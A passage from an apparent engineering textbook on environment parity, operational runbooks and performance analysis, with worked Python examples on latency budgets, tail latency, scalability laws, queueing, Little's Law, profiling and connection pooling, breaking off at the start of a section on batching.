instances 1 2 40 <- concurrency,
queue in-memory Kafka (1 broker) Kafka (3 brokers) leader election
third parties mocked sandbox live <- rate limits,
TLS off on on timeouts
latency to DB 0.1 ms 1 ms 3 ms + failover
Bugs that ONLY appear at the right-hand column: lock contention, index
choice at scale, partial failure, clock skew, connection exhaustion.
# Docker Compose for local development: same engines, same versions, same
# protocols as production -- scaled down, not substituted.
services:
postgres:
image: postgres:16.3 # the exact production version, pinned
environment: { POSTGRES_PASSWORD: local }
ports: ["5432:5432"]
redis:
image: redis:7.2
kafka:
image: confluentinc/cp-kafka:7.6.0
localstack:
image: localstack/localstack:3 # S3/SQS with the real API surface
environment: { SERVICES: s3,sqs }
app:
build: .
environment:
APP_DATABASE_URL: postgres://postgres:local@postgres:5432/app
APP_KAFKA_BROKERS: kafka:9092
depends_on: [postgres, redis, kafka, localstack]
# The differences that REMAIN are deliberate and known: single broker, tiny
# dataset, no TLS locally. Write them down rather than discovering them.
Complete parity is neither achievable nor desirable — nobody should run a 40-node production replica per developer. The workable strategy is to be exact about kinds and versions, approximate about scale, and explicit about what differs:
- Same backing service types and versions everywhere. This is the highest-value rule and the cheapest to follow with containers.
- Same deployment mechanism. If production uses Kubernetes and staging uses a docker-compose file, staging does not test your manifests, probes, or resource limits.
- Representative data volume in at least one pre-production environment, since query plans and index choices change with cardinality. Use anonymized or synthetic data (11.2), never a production copy.
- Real dependency behaviour where it matters — sandbox APIs over mocks for integration testing, because mocks encode your assumptions rather than the vendor's behaviour.
- Document the known gaps and treat each one as a risk with an owner.
Two techniques narrow the gap further. Ephemeral preview environments created per pull request from the same IaC as production give a real environment per change and are discarded afterwards. And testing in production — canaries, feature flags, shadow traffic — accepts that some behaviour is only observable with real traffic, and makes that observation safe rather than pretending staging covered it.
Key Takeaways
- Every environment difference is a place where pre-production testing silently stops predicting production behaviour.
- Match backing service types and versions exactly; approximate scale deliberately.
- Use the same deployment mechanism in staging as in production, or you are not testing your deployment configuration.
- Keep at least one environment with representative data volume, using anonymized or synthetic data.
- Full parity is impossible: write down the remaining gaps, and use preview environments plus canaries and flags to cover what staging cannot.
🧪 Practice
- Build the parity table for a system you work on and mark each difference as acceptable or risky.
- Create a local compose stack matching production service versions exactly, and list what still differs.
- Interview: A bug appears only in production. What differences would you investigate first? (Hint: think about scale, concurrency, data shape, and which dependencies are real versus mocked.)
Runbooks and Operational Documentation
A runbook is a document telling a responder exactly how to handle a specific operational situation. It exists because incidents happen at 3 a.m. to whoever is on call, not to the person who built the system — and because the knowledge required is otherwise held in a few people's heads, which makes those people a single point of failure and guarantees slow responses whenever they are asleep, on holiday, or gone.
The distinction from general documentation is that a runbook is procedural and situational: it starts from a symptom or an alert, gives concrete commands, and leads to a decision. Architecture documents explain how the system works; runbooks explain what to do right now.
# Runbook: OrdersHighErrorRate
**Alert**: `OrdersErrorBudgetFastBurn`
**Severity**: SEV2 (SEV1 if checkout success < 90%)
**Owner**: orders-team **Last verified**: 2026-08-12 (game day)
## Impact
Users see failed checkouts. Revenue impact is roughly $4k per minute at peak.
## Quick assessment (2 minutes)
1. Dashboard: https://grafana.example.com/d/orders-health
2. Recent deploys: `kubectl rollout history deployment/orders -n prod`
3. Dependency status: https://status.example.com/internal
## Decision tree
- Deploy in the last 30 minutes?
-> **Roll back first**: `./scripts/rollback.sh orders` (~2 min to effect)
- Errors concentrated in one AZ?
-> Fail over: `./scripts/drain-az.sh <az>`
- `payments` dependency failing?
-> Enable degraded mode: `./scripts/flag.sh set checkout_offline_queue true`
Orders are queued and settled asynchronously. Expect support tickets.
- Database connection errors?
-> Check pool saturation panel; if exhausted, scale down non-critical
consumers first: `./scripts/scale.sh reporting 0`
## Escalation
- 15 min without mitigation -> page orders-team secondary
- 30 min or revenue impact > $100k -> page engineering director, open SEV1
## After mitigation
Open a postmortem (see the blameless process) and attach the incident timeline.
## Verification
This runbook's commands were last executed successfully during the 2026-08-12
game day. If any command fails, fix the runbook as part of the incident.
# The best runbook step is one that has become a script; the best script is one
# that has become automation. Track where each runbook sits on that ladder.
RUNBOOK_MATURITY = {
"manual_prose": 0, # "check the logs and see"
"exact_commands": 1, # copy-pasteable, tested
"single_script": 2, # one command does the whole procedure
"automated": 3, # runs without a human; alerts only on failure
}
def audit_runbooks(runbooks, alert_history):
for rb in runbooks:
fires = sum(1 for a in alert_history if a["name"] == rb["alert"])
stale_days = (today() - rb["last_verified"]).days
if fires > 10 and rb["maturity"] < 2:
print(f"{rb['alert']}: fired {fires}x, still manual -> script it")
if stale_days > 180:
print(f"{rb['alert']}: unverified for {stale_days} days -> game day it")
if rb["maturity"] == 3:
print(f"{rb['alert']}: automated -> should this still page a human?")
What separates useful runbooks from documentation nobody reads:
- One runbook per alert, linked from the alert itself. A responder should never have to search.
- Start with impact and assessment, so the responder knows the stakes and can triage before acting.
- Concrete, copy-pasteable commands with expected output — not "restart the service" but the exact command and how to tell it worked.
- Decision trees over prose. Under stress people follow branches; they do not parse paragraphs.
- Include the escalation path and the criteria for using it, so escalation is a decision rather than an act of desperation.
- Verify by execution. A runbook is only trustworthy if someone has recently run it — game days (9.4) are the mechanism, and every incident that finds a wrong step should fix it before closing.
The broader documentation set that pays for itself: architecture decision records (chapter 1) for why things are the way they are, service catalogues mapping each service to its owner, dependencies, SLOs, and on-call rotation, and on-boarding documents that a new engineer follows to their first deploy. All of it decays, which is why the only reliable pattern is documentation kept next to the code, updated in the same pull request, and validated by someone actually using it.
Key Takeaways
- Runbooks turn one person's knowledge into a procedure anyone on call can follow; they are situational and procedural, not explanatory.
- Link a runbook from every alert, and lead with impact, assessment, and a decision tree rather than prose.
- Give exact commands with expected output, plus explicit escalation criteria.
- Track maturity: manual steps should become scripts, and frequently used scripts should become automation that pages only on failure.
- Runbooks decay — verify them in game days and fix them during the incident that exposed the error.
🧪 Practice
- Write a runbook for an alert on a system you know, including a decision tree and escalation criteria.
- Take a manual runbook step and convert it into a tested script invoked by one command.
- Interview: How do you keep runbooks from going stale? (Hint: think about what forces someone to execute them on a schedule, and who fixes them when a step fails.)
<a id="13-performance-and-cost-engineering"></a>
13. Performance and Cost Engineering
Performance and cost are the same conversation held in different units: every millisecond you remove is bought with money, complexity, or reliability, and every dollar you save eventually shows up somewhere in the latency distribution. This chapter covers how to analyse where time actually goes, the optimisation techniques that buy the most latency per unit of complexity, the testing that proves a system holds up under load before your users discover otherwise, and the cost engineering that keeps a fast system affordable.
<a id="131-performance-analysis"></a>
13.1 Performance Analysis
Optimisation without measurement is superstition, so this subchapter starts with how to reason quantitatively about latency: budgeting it across a request path, understanding why the slow tail dominates user experience, the mathematical laws that cap what parallelism and scaling can buy, the queueing behaviour that explains why systems collapse at high utilisation, and the profiling tools that point at the code actually responsible.
Latency Budgets
Users do not experience your service; they experience a page, a tap, or an API call that fans out across many services. When a product decision says "search results in under 300 ms at the 95th percentile", that 300 ms has to be divided among everyone on the path — DNS, TLS, the gateway, the search service, the ranking call, the database, the render. A latency budget is that division written down, so each team knows how much time it owns and can tell when it has overspent.
The analogy is a household budget. Total income is fixed by the product requirement; each line item gets an allocation; if one line overspends, another must underspend or the total breaks. The value is not the arithmetic — it is that overspending becomes visible and attributable instead of being an argument about whose service is "slow".
Two rules govern how budgets compose:
- Sequential calls add. If A calls B and then C, A's latency is at least
B + Cplus A's own work. - Parallel calls take the maximum, not the sum — but the maximum over several slow tails is worse than any individual tail (see the next topic).
BUDGET FOR "SEARCH RESULTS" — 300 ms at p95, user-perceived
client --> edge/CDN --> gateway --> search-svc --+--> index shard (parallel)
+--> ranking-svc
+--> ads-svc
+------------------------------+--------+-------------------------------+
| Segment | Budget | Notes |
+------------------------------+--------+-------------------------------+
| Network client -> edge | 60 ms | Geography, not code (5.4) |
| TLS + edge routing | 15 ms | Session resumption helps |
| Gateway (authn, quota) | 10 ms | Assumes token cache hit |
| search-svc own work | 25 ms | Parse, plan, merge |
| MAX(index, ranking, ads) | 120 ms | Parallel fan-out |
| Serialization + render start | 40 ms | Payload size matters |
| Reserve (headroom) | 30 ms | ~10% unallocated on purpose |
+------------------------------+--------+-------------------------------+
| TOTAL | 300 ms | |
+------------------------------+--------+-------------------------------+
The reserve line matters. A budget allocated to 100% has no room for the day a dependency regresses by 20 ms, so every such day becomes an emergency. Ten to twenty percent of unallocated headroom converts emergencies into planned work.
from dataclasses import dataclass
@dataclass
class Segment:
name: str
budget_ms: float
measured_p95_ms: float
parallel_group: str | None = None # segments sharing a group run concurrently
def evaluate(segments: list[Segment], target_ms: float) -> None:
sequential = [s for s in segments if s.parallel_group is None]
groups: dict[str, list[Segment]] = {}
for s in segments:
if s.parallel_group:
groups.setdefault(s.parallel_group, []).append(s)
# Sequential work adds; each parallel group contributes only its slowest leg.
measured = sum(s.measured_p95_ms for s in sequential)
measured += sum(max(g, key=lambda s: s.measured_p95_ms).measured_p95_ms
for g in groups.values())
for s in segments:
delta = s.measured_p95_ms - s.budget_ms
flag = "OVER" if delta > 0 else "ok "
print(f"{flag} {s.name:<22} budget={s.budget_ms:6.1f} "
f"actual={s.measured_p95_ms:6.1f} delta={delta:+6.1f}")
headroom = target_ms - measured
print(f"\ntotal p95 = {measured:.1f} ms / target {target_ms:.0f} ms "
f"({'PASS' if headroom >= 0 else 'FAIL'}, headroom {headroom:+.1f} ms)")
evaluate([
Segment("network_client_edge", 60, 58),
Segment("tls_edge_routing", 15, 14),
Segment("gateway_auth", 10, 22), # over budget: cache misses
Segment("search_own_work", 25, 21),
Segment("index_shard", 120, 96, "fanout"),
Segment("ranking_svc", 120, 131, "fanout"), # slowest leg sets the group
Segment("ads_svc", 120, 44, "fanout"),
Segment("serialize_render", 40, 37),
], target_ms=300)
Budgets should be enforced, not merely documented: express each segment as an SLO (12.2), alert when a dependency exceeds its allocation, and derive client timeouts from the budget rather than from an arbitrary round number. A timeout larger than the budget guarantees that when a dependency is slow, the caller waits past the point where the answer is still useful to anyone.
Key Takeaways
- A latency budget divides an end-to-end target among every segment of the request path so overspending is visible and attributable.
- Sequential segments add; parallel fan-outs contribute only their slowest leg.
- Leave 10-20% unallocated as headroom, or every dependency regression becomes an incident.
- Budget at a percentile (p95/p99), never at the mean.
- Derive timeouts from the budget: waiting longer than the budget produces an answer nobody can still use.
🧪 Practice
- Draw the request path for an endpoint you know and assign a budget to each segment totalling the product requirement, including headroom.
- Measure the real p95 of two segments and compute how much budget the remaining segments still have.
- Interview: A page must render in 200 ms but calls five services. How do you allocate the budget? (Hint: think about which calls can run concurrently, and what happens to the tail when you take a maximum over five distributions.)
Tail Latency and P99
Averages lie about user experience. If 99 requests take 10 ms and one takes 1 000 ms, the mean is about 20 ms — a number that describes no request that actually happened. Percentiles describe the distribution honestly: p50 is the median request, p99 is slower than 99% of the others, and everything above p95 is the tail.
Tails matter more than intuition suggests, for two reasons. First, tail events
are not spread evenly across users — the same users hit them repeatedly, because
slowness correlates with having more data, a worse connection, or a larger
account. Second, tail latency amplifies under fan-out. If a request calls 100
independent services and each is slow 1% of the time, the chance that at least
one is slow is 1 - 0.99^100 = 63%. A service's p99 becomes the user's median.
LATENCY DISTRIBUTION
count
|############
|############
|############
|############===
|################=-- - - -
+----+--------+-------+-------+---------+----------> latency
p50 p90 p95 p99 p99.9
10ms 40ms 75ms 380ms 2.1s
|<------ the tail ------>|
mean = 34 ms <- describes nobody
FAN-OUT AMPLIFICATION: P(at least one slow leg) = 1 - (1 - p)^N [p = 1%]
N=1 -> 1.0% N=10 -> 9.6% N=50 -> 39.5% N=100 -> 63.4%
import asyncio
def tail_amplification(p_slow: float, fan_out: int) -> float:
"""Probability that at least one of `fan_out` independent legs is slow."""
return 1 - (1 - p_slow) ** fan_out
for n in (1, 5, 10, 50, 100):
print(f"fan-out {n:>3}: {tail_amplification(0.01, n):.1%} of requests hit a slow leg")
# ---- Hedged requests: send a second copy once the first exceeds p95 ---------
# Costs a few percent extra load and cuts the tail sharply, because the chance
# that BOTH copies are slow is far lower than the chance that one is.
async def hedged_call(send, hedge_after_ms: float, timeout_ms: float):
first = asyncio.create_task(send())
done, _ = await asyncio.wait({first}, timeout=hedge_after_ms / 1000)
if done:
return first.result() # fast path: no extra load
second = asyncio.create_task(send()) # hedge only for the slow ~5%
done, pending = await asyncio.wait(
{first, second}, timeout=timeout_ms / 1000,
return_when=asyncio.FIRST_COMPLETED)
for task in pending:
task.cancel() # always cancel the loser
if not done:
raise TimeoutError("both copies exceeded the budget")
return done.pop().result()
Common causes of tail latency, roughly in order of how often they turn out to be the culprit: queueing behind other work, garbage collection or compaction pauses, cold caches, lock contention, retries after a timeout, noisy neighbours on shared hardware, and connection setup on a cold path. Note how many are shared-resource effects rather than slow code — which is why profiling one request in isolation often fails to explain a bad p99.
| Technique | How it helps the tail | Cost |
|---|---|---|
| Hedged / tied requests | A second copy usually avoids the unlucky server | A few percent extra load |
| Narrower fan-out | Fewer chances to draw a slow leg | Less parallelism |
| Per-request timeout + retry | Caps the worst case | Retry storms if uncontrolled |
| Load-aware balancing (6.2) | Avoids servers already queueing | Balancer complexity |
| Prioritising interactive work | Batch jobs stop blocking user requests | Scheduling machinery |
| Cache warm-up on deploy | Removes cold-start outliers | Memory, slower rollouts |
One aggregation rule deserves emphasis: percentiles do not average. The mean of ten servers' p99 values is not the fleet p99, and averaging p99 over 24 hourly windows is not the daily p99. Aggregate the underlying histograms and compute the percentile once, which is exactly why histogram metrics (12.1) exist.
Key Takeaways
- Report p50, p95, p99, and p99.9 — the mean describes no real request.
- Fan-out amplifies tails: with N parallel legs the chance of hitting a slow one is
1 - (1 - p)^N, so a service p99 becomes a user-visible median.- Never average percentiles across servers or time windows; merge histograms instead.
- Most tail latency comes from shared-resource contention — queueing, GC, locks — not from slow application code.
- Hedged requests buy large tail reductions for a small, bounded load increase.
🧪 Practice
- Take a service's latency histogram and compute p50/p95/p99, then describe which group of users each number represents.
- Compute the probability of hitting a slow leg with a fan-out of 20 when each leg is slow 0.5% of the time, then propose two ways to reduce it.
- Interview: Why is averaging the p99 values from ten servers wrong? (Hint: think about what a percentile is computed from, and whether that computation can be undone from the summary.)
Amdahl's and Universal Scalability Laws
Adding machines or threads feels like it should make things proportionally faster, and for a while it does. Two laws explain why it always stops, and why it sometimes goes backwards.
Amdahl's Law begins with the observation that every program has a part that
cannot be parallelised — reading configuration, taking a lock, writing the final
result. If a fraction s of the work is serial, then no matter how many workers
N you add, speed-up is capped:
speedup(N) = 1 / (s + (1 - s) / N) -> 1 / s as N -> infinity
With 5% serial work the ceiling is 20x, however many cores you buy. The analogy is a kitchen: hiring more cooks parallelises the chopping, but there is one oven and one plating step, and eventually everyone is waiting on the oven.
The Universal Scalability Law (USL) adds the term Amdahl ignores: workers do not merely fail to help, they interfere with each other. Coordination — cache coherence, lock handoff, consensus rounds, cross-shard chatter — grows with the number of pairs of workers, so throughput eventually declines as capacity is added:
C(N) = N / (1 + a(N - 1) + b * N(N - 1))
a = contention (serialisation) b = coherency (crosstalk)
THROUGHPUT vs WORKERS
x | ideal (linear)
| ,'
| ,' ___ Amdahl ceiling (1/s)
| ,' _.--''''
| ,' _.--''
|,' _.-' .------. USL: peaks, then FALLS
| _.-' .-' `--.___
| .-' .-' `-----____
+---------------------------------------------------------> N workers
^ optimal N when b > 0
def amdahl(n: int, serial_fraction: float) -> float:
return 1 / (serial_fraction + (1 - serial_fraction) / n)
def usl(n: int, alpha: float, beta: float) -> float:
"""alpha = contention (queueing on shared resources),
beta = coherency (cost of keeping workers consistent with each other)."""
return n / (1 + alpha * (n - 1) + beta * n * (n - 1))
print(f"{'N':>5} {'Amdahl(s=5%)':>14} {'USL(a=.03,b=.0005)':>20}")
for n in (1, 2, 4, 8, 16, 32, 64, 128, 256):
print(f"{n:>5} {amdahl(n, 0.05):>13.1f}x {usl(n, 0.03, 0.0005):>19.1f}x")
# Where does adding workers stop paying?
best = max(range(1, 513), key=lambda n: usl(n, 0.03, 0.0005))
print(f"\npeak throughput at N = {best}; past this point more workers do LESS work")
The practical readings:
| Observation | Likely cause | What to do |
|---|---|---|
| Speed-up flattens at a fixed multiple | Serial fraction (Amdahl) | Shrink the serial section |
| Throughput peaks, then declines | Coherency term (USL b) | Remove cross-worker coordination |
| Latency rises while throughput is flat | Contention (a), queueing | Shard state, narrow lock scope |
The lesson for system design is that scaling problems are usually coordination
problems. Sharding by key so workers never touch the same state (4.5),
eliminating shared counters, and accepting eventual consistency where the product
allows (8.2) all reduce b — which raises the ceiling far more reliably than
buying hardware does.
Key Takeaways
- Amdahl's Law caps speed-up at
1/s; a 5% serial fraction means a 20x ceiling regardless of machine count.- USL adds a coherency term, so throughput can peak and then decline as workers are added.
- Fit both curves to real measurements — the parameters tell you whether to attack serialisation or coordination.
- The most durable scaling wins come from removing shared state, not from adding capacity.
- Always ask "what is the serial part?" before buying more machines.
🧪 Practice
- Compute Amdahl speed-up at N = 8, 64, and 1024 for serial fractions of 1%, 5%, and 20%.
- Measure throughput at several thread counts for a small program, fit USL parameters, and locate the peak.
- Interview: Your service gets slower when you scale from 40 to 60 instances. What is happening? (Hint: think about what all those instances share — a database, a lock, a cache-invalidation broadcast — and how that cost grows with instance count.)
Queueing Theory Basics
Every component that can be busy is a queue: threads waiting for a CPU, requests waiting for a connection from the pool, jobs waiting for a worker. Queueing theory explains the most counter-intuitive fact in performance engineering — waiting time does not grow linearly with load, it grows hyperbolically, exploding as utilisation approaches 100%.
The intuition is a supermarket checkout. At 50% utilisation the cashier is often idle when you arrive, so you walk straight up. At 95% utilisation you almost always arrive mid-transaction with people ahead of you. The arrival rate merely doubled; your wait grew by an order of magnitude, because queues exist to absorb variability and there is no idle time left to absorb it with.
For the simplest model (M/M/1: random arrivals, random service times, one server)
with utilisation rho = arrival rate / service rate:
average time in system W = service_time / (1 - rho)
RESPONSE TIME vs UTILISATION (service time = 10 ms)
W | ,
200| ,'
| ,'
150| ,-'
| ,--'
100| _,---'
| __,---''
50| ______,,,---''''
10+----''''''
+----+-----+-----+-----+-----+-----+-----+-----+-----+----> rho
0.1 0.2 0.4 0.5 0.7 0.8 0.9 0.95 0.99
rho=0.5 -> 20 ms rho=0.9 -> 100 ms rho=0.95 -> 200 ms
The last 5% of capacity costs more latency than the first 90%.
import math
def mm1_response_time_ms(service_ms: float, utilisation: float) -> float:
if utilisation >= 1:
return float("inf") # arrivals outpace service: the queue is unbounded
return service_ms / (1 - utilisation)
for rho in (0.3, 0.5, 0.7, 0.8, 0.9, 0.95, 0.98, 0.99):
w = mm1_response_time_ms(10, rho)
print(f"rho={rho:>4}: response={w:8.1f} ms (of which queueing {w - 10:7.1f} ms)")
# Multiple servers behind ONE queue pool their variability, so the same total
# utilisation hurts less than N independent queues at that utilisation.
def servers_needed(arrival_rate: float, per_server_rate: float, target_rho: float) -> int:
return math.ceil(arrival_rate / (per_server_rate * target_rho))
print(servers_needed(arrival_rate=900, per_server_rate=100, target_rho=0.7)) # 13
Three design consequences follow directly:
- Run below roughly 70% utilisation for latency-sensitive services. The remaining headroom is not waste; it is the buffer that keeps p99 bounded and absorbs spikes and instance failures. Batch systems, where only throughput matters, can safely run near 100%.
- Prefer one shared queue over per-server queues. A single queue feeding N workers pools variability, so no worker sits idle while another has a backlog. This is precisely why least-outstanding-requests balancing beats round-robin (6.2).
- Reduce variability, not just the mean. Queue wait depends on the variance of service times as much as on the average, so one pathological slow query degrades everyone behind it. Bounded queues with load shedding (6.3) let a saturated system degrade instead of collapsing.
Key Takeaways
- Wait time follows
W = S / (1 - rho): it explodes as utilisation nears 1.- Target roughly 70% utilisation for interactive services; headroom is latency insurance, not waste.
- Variance in service time inflates queueing as much as the mean does.
- One queue in front of N workers outperforms N separate queues.
- An unbounded queue turns overload into a total outage; bound queues and shed load instead.
🧪 Practice
- Plot response time against utilisation from 0.1 to 0.99 for a 20 ms service time and mark where p99 stops being acceptable.
- Compute how many workers a 900 rps workload needs at 70% utilisation if each worker sustains 100 rps.
- Interview: CPU sits at 85% and latency is terrible, but adding two instances fixes it completely. Explain why. (Hint: split response time into service and waiting, and ask how each responds to lower utilisation.)
Little's Law
Little's Law is the closest thing performance engineering has to a free lunch: it holds for any stable system, regardless of arrival distribution, service distribution, or scheduling policy.
L = lambda * W concurrency = throughput * latency
L is the average number of items in the system, lambda the average arrival
rate, and W the average time each item spends inside. The power is that any two
give you the third — which lets you size thread pools, predict queue depths, and
sanity-check load-test output without simulating anything.
Think of a restaurant: if 30 diners arrive per hour and each stays 45 minutes,
the average number of occupied tables is 30 * 0.75 = 22.5. With fewer tables
than that, a queue forms at the door and never clears.
lambda = 500 req/s W = 0.2 s
arrivals ----------------> [ SYSTEM ] ----------------> departures
L = lambda * W = 500 * 0.2 = 100
=> 100 requests are in flight at steady state, so you need at least 100
concurrent slots (threads, connections, goroutines) to sustain 500 rps
at 200 ms. Fewer slots, and arrivals queue outside the system.
def concurrency(throughput_rps: float, latency_s: float) -> float:
"""L = lambda * W — how many requests are in flight at steady state."""
return throughput_rps * latency_s
def max_throughput(pool_size: int, latency_s: float) -> float:
"""Invert the law: with a fixed pool, latency caps throughput."""
return pool_size / latency_s
print(concurrency(500, 0.200)) # 100 in-flight requests
print(max_throughput(50, 0.200)) # 250 rps ceiling with a 50-slot pool
# A worked sizing problem ----------------------------------------------------
target_rps, p99_latency_s, safety = 1200, 0.150, 1.3
pool = concurrency(target_rps, p99_latency_s) * safety
print(f"size the pool for ~{pool:.0f} concurrent slots") # ~234
# The trap: if downstream latency doubles, the SAME pool halves your throughput.
print(max_throughput(234, 0.300)) # 780 rps — a latency regression silently
# became a capacity regression
That last line is the important one. Little's Law explains the most common
cascading failure in distributed systems: a dependency slows down, W rises,
in-flight requests L climb until the pool is exhausted, and the caller — whose
own code did not change at all — starts rejecting traffic. This is why timeouts,
bulkheads, and circuit breakers (9.2) are capacity controls as much as reliability
controls: they cap W so L cannot grow without bound.
| Question | Apply Little's Law as |
|---|---|
| How big should the thread pool be? | L = target_rps * p99_latency plus margin |
| What throughput can this pool sustain? | lambda = L / W |
| Why is my queue depth 4 000? | W = L / lambda — compute the implied wait |
| Are my load-test numbers self-consistent? | Check L = lambda * W across the metrics |
Key Takeaways
L = lambda * Wholds for any stable system — no distributional assumptions required.- Use it to size pools: required concurrency = target throughput * latency.
- Inverted, it shows a fixed pool turns any latency regression directly into a throughput regression.
- Queue depth plus arrival rate gives wait time without instrumenting it.
- It is the fastest sanity check on load-test output: if
L != lambda * W, one of the reported numbers is wrong.
🧪 Practice
- A service handles 2 000 rps at 50 ms average latency. How many requests are in flight, and what is the minimum worker count?
- A queue holds 10 000 messages and consumers process 500/s. How long does a newly enqueued message wait?
- Interview: A dependency's latency doubles while your traffic is unchanged, and your service starts shedding load. Explain the mechanism. (Hint: hold lambda fixed, double W, and ask what happens to L relative to your pool size.)
Profiling and Flame Graphs
Profiling answers the only question worth asking before optimising: where does the time actually go? Engineers are famously bad at guessing — the code that looks expensive is usually not the hot path, and the real cost often hides in serialisation, allocation, logging, or a lock nobody thought about.
There are two families, and confusing them wastes days:
| Profiler type | How it works | Good for | Watch out for |
|---|---|---|---|
| Sampling | Interrupt periodically, record the stack | Low overhead, safe in production | Misses rare-but-slow events |
| Instrumenting | Record entry and exit of every function | Exact call counts | High overhead, distorts behaviour |
| On-CPU | Samples only running threads | Compute-bound hot spots | Blind to blocking |
| Off-CPU / wall | Samples blocked time as well | I/O waits, lock contention | Noisier, needs kernel support |
The classic mistake is profiling on-CPU when the problem is off-CPU. If a service sits at 15% CPU with terrible latency, a CPU profile shows nothing useful, because the time is spent waiting — on a database, a lock, or a connection pool.
A flame graph turns a pile of stack samples into one picture. Each box is a function; a box sits on top of its caller; the width is the proportion of samples containing that frame. Width means cost. Order along the x-axis is alphabetical, not chronological — a common misreading.
FLAME GRAPH — width = share of samples (cost), height = call depth
|------------------------------------------------------------------| main
|------------------------------------------------------------------| handle_request
|--------------------|--------|----------|---------|---------------|
| serialize_json | authz | db_query | render | log_event |
| 42% | 6% | 18% | 9% | 25% |
|-------| | | | |----| |
| encode| | | | |fmt | |
| 38% | | | | |22% | |
^^^^^^^^ ^^^^
The widest LEAF frames are where time is actually spent. Here JSON encoding
and log formatting cost 60% between them — neither is "business logic".
# A reproducible micro-investigation: profile first, then act on the widest frame.
import cProfile, pstats, io, json, random
def build_payload(n=2000):
return [{"id": i, "name": f"item-{i}", "tags": ["a", "b", "c"],
"score": random.random()} for i in range(n)]
def handle_request(payload):
return json.dumps(payload) # the suspected hot spot
payload = build_payload()
profiler = cProfile.Profile()
profiler.enable()
for _ in range(200):
handle_request(payload)
profiler.disable()
buf = io.StringIO()
pstats.Stats(profiler, stream=buf).sort_stats("cumulative").print_stats(10)
print(buf.getvalue())
# In production, use a CONTINUOUS sampling profiler instead (perf,
# async-profiler, py-spy, pprof) at around 99 Hz: cheap enough to leave on
# permanently, which is the only way to catch a regression you did not predict.
# 99 rather than 100 avoids sampling in lockstep with timers that fire on
# round intervals.
A disciplined optimisation loop looks like this: measure a baseline under realistic load, profile to find the widest frame, form a hypothesis about why it is wide, change one thing, re-measure, and keep the change only if the improvement exceeds measurement noise. Optimising anything other than the widest frame is bounded by Amdahl's Law — making 5% of the runtime twice as fast buys you 2.5%.
Key Takeaways
- Profile before optimising; intuition about hot paths is unreliable.
- Sampling profilers are cheap enough for continuous production use; instrumenting profilers distort what they measure.
- Low CPU with high latency means you need an off-CPU or wall-clock profile.
- In a flame graph, width is cost and x-axis order carries no meaning.
- Attack the widest frame first — Amdahl's Law caps what any narrow frame can return.
🧪 Practice
- Profile a script that reads, transforms, and serialises data, and identify the top three frames by cumulative time.
- Generate a flame graph for a running service and explain its widest leaf.
- Interview: CPU utilisation is 20% but p99 latency is 3 seconds. How do you find the cause? (Hint: think about what a CPU profiler cannot see, and which signals show time spent blocked rather than running.)
<a id="132-optimization-techniques"></a>
13.2 Optimization Techniques
Once analysis has told you where the time goes, a small set of techniques accounts for most of the latency ever recovered from real systems. This subchapter covers reusing expensive connections, amortising per-operation overhead through batching, trading CPU for bandwidth with compression, moving work out of the request path by precomputing it, shaping the read and write paths independently, and tuning concurrency so the machine is busy without being congested.
Connection Reuse and Pooling
Opening a connection is disproportionately expensive compared to using one. A new TCP connection costs a round trip for the handshake; adding TLS costs one or two more; a database connection then costs authentication, session setup, and often server-side memory allocation. On a 40 ms round trip, that is 80-120 ms spent before a single byte of your query moves — for a query that takes 2 ms to run.
The fix is to treat connections as durable resources rather than per-request objects. Keep them open and hand them back and forth: HTTP keep-alive at the protocol level, connection pools at the client level.
WITHOUT REUSE (per request) WITH REUSE (per request)
SYN --------> (connection already established)
<-------- SYN/ACK query ------->
ACK --------> <------- result
TLS ClientHello -> total: ~1 RTT + service time
<-- ServerHello, cert
TLS Finished ---->
<-------- Finished
auth handshake -->
<-------- ok
query ---------->
<-------- result
total: ~4-5 RTT + service time
Pool sizing is where most teams go wrong, in both directions. Too small and
requests queue for a slot — Little's Law again, with the pool as L. Too large
and you overwhelm the database: each connection consumes memory and a backend
process or thread, and beyond the server's parallelism the extra connections only
add contention. A database with 8 cores does not go faster with 500 connections
than with 40; it goes slower.
from sqlalchemy import create_engine
engine = create_engine(
"postgresql://app@db-primary/orders",
pool_size=20, # steady-state connections kept open per app instance
max_overflow=10, # temporary extras during bursts; closed after use
pool_timeout=2, # FAIL FAST when saturated instead of queueing forever
pool_recycle=1800, # reopen every 30 min: dodges silent NAT/firewall drops
pool_pre_ping=True, # cheap liveness check before handing out a connection
)
# Sizing sanity check across the fleet -------------------------------------
INSTANCES, DB_MAX_CONNECTIONS = 24, 500
per_instance = 20 + 10
print(f"worst case = {INSTANCES * per_instance} connections vs server limit "
f"{DB_MAX_CONNECTIONS}") # 720 > 500: the fleet can exhaust the database
# Two ways out:
# 1. shrink the pool so INSTANCES * (pool_size + overflow) < DB_MAX_CONNECTIONS
# 2. put a connection proxy (PgBouncer, ProxySQL, RDS Proxy) in front, so many
# short app-side connections multiplex onto few real server connections
import httpx
# One long-lived client per process. Creating a client per request throws away
# the connection pool, the TLS session cache, and any HTTP/2 multiplexing.
client = httpx.Client(
limits=httpx.Limits(max_connections=100, max_keepalive_connections=20),
timeout=httpx.Timeout(connect=1.0, read=2.0, write=2.0, pool=0.5),
http2=True, # many requests share one connection; no head-of-line
) # blocking at the HTTP layer
def fetch_user(user_id: str) -> dict:
return client.get(f"https://users.internal/v1/{user_id}").json()
Practical rules: one client or pool per process, created at start-up; pool timeouts short so saturation surfaces as a fast error rather than a hang; recycle connections periodically to survive network devices that drop idle flows; and separate pools for workloads with different criticality so a slow reporting query cannot starve checkout of connections (the bulkhead pattern, 9.2).
Key Takeaways
- Connection setup can cost several round trips; reuse turns that into zero.
- Create one pool or HTTP client per process and share it — never per request.
- Oversized pools hurt the server; size against the database's connection limit across the whole fleet, not per instance.
- Set a short pool checkout timeout so saturation fails fast instead of hanging.
- Use separate pools for workloads of different criticality, and a proxy when instance count makes direct pooling unworkable.
🧪 Practice
- Measure the latency difference between 100 requests over a fresh connection each and 100 over one reused connection.
- Compute the fleet-wide worst-case connection count for a service with 30 instances, pool size 15, overflow 10 — and decide whether it fits a 400 connection limit.
- Interview: Your app has 50 instances each with a pool of 20 against one Postgres primary. What breaks and how do you fix it? (Hint: multiply, then think about what sits between the app and the database.)
Batching and Coalescing
Every operation carries fixed overhead: a network round trip, a syscall, a query parse, a lock acquisition, a durability flush. When that fixed cost dominates the marginal cost of the work itself, doing many small operations is enormously wasteful. Batching amortises the fixed cost over many items.
The analogy is grocery shopping: driving to the shop for one onion, then again for one carrot, is absurd — you make a list. The N+1 query problem is exactly that mistake expressed in code.
N+1 QUERIES BATCHED
SELECT * FROM orders LIMIT 100 SELECT * FROM orders LIMIT 100
